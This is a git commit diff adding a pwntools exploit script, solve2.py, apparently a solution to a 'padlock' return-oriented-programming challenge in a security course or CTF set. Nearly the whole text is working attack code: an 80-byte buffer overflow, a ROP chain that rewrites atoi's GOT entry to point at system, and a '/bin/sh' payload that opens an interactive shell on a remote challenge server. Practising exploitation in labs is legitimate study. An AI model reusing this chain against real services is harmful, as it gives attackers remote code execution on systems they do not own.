rop and lab3_4_recap

2026-05-20 12:45:03 +02:00
parent c9dbb784b4
commit fa309f3919
50 changed files with 1083 additions and 0 deletions
--- a/rop/05_padlock/solve2.py
+++ b/rop/05_padlock/solve2.py
@@ -0,0 +1,44 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13543)
+
+add_what = elf.sym["add_what_where"]
+atoi_got = elf.got["atoi"]
+main = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF  # format string
+pop_rsi = 0x0000000000401208  # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+
+# populate got table
+first_run = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(main),
+)
+p.sendline(first_run)
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+diff = libc.symbols["system"] - libc.symbols["atoi"]
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdi),
+    p64(atoi_got),
+    p64(pop_rsi),
+    p64(diff),
+    p64(add_what),
+    p64(ret),
+    p64(main),
+)
+p.sendline(payload)
+p.sendline(b"/bin/sh")
+p.interactive()